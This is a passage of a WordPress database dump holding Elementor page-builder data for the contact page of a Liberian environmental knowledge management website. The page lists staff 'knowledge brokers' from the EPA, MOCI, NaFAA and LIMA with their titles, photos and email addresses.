lements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24487,3614,'_elementor_edit_mode','builder'),(24488,3614,'_elementor_template_type','wp-page'),(24489,3614,'_elementor_version','3.0.16'),(24490,3614,'_wp_page_template','default'),(24491,3614,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\"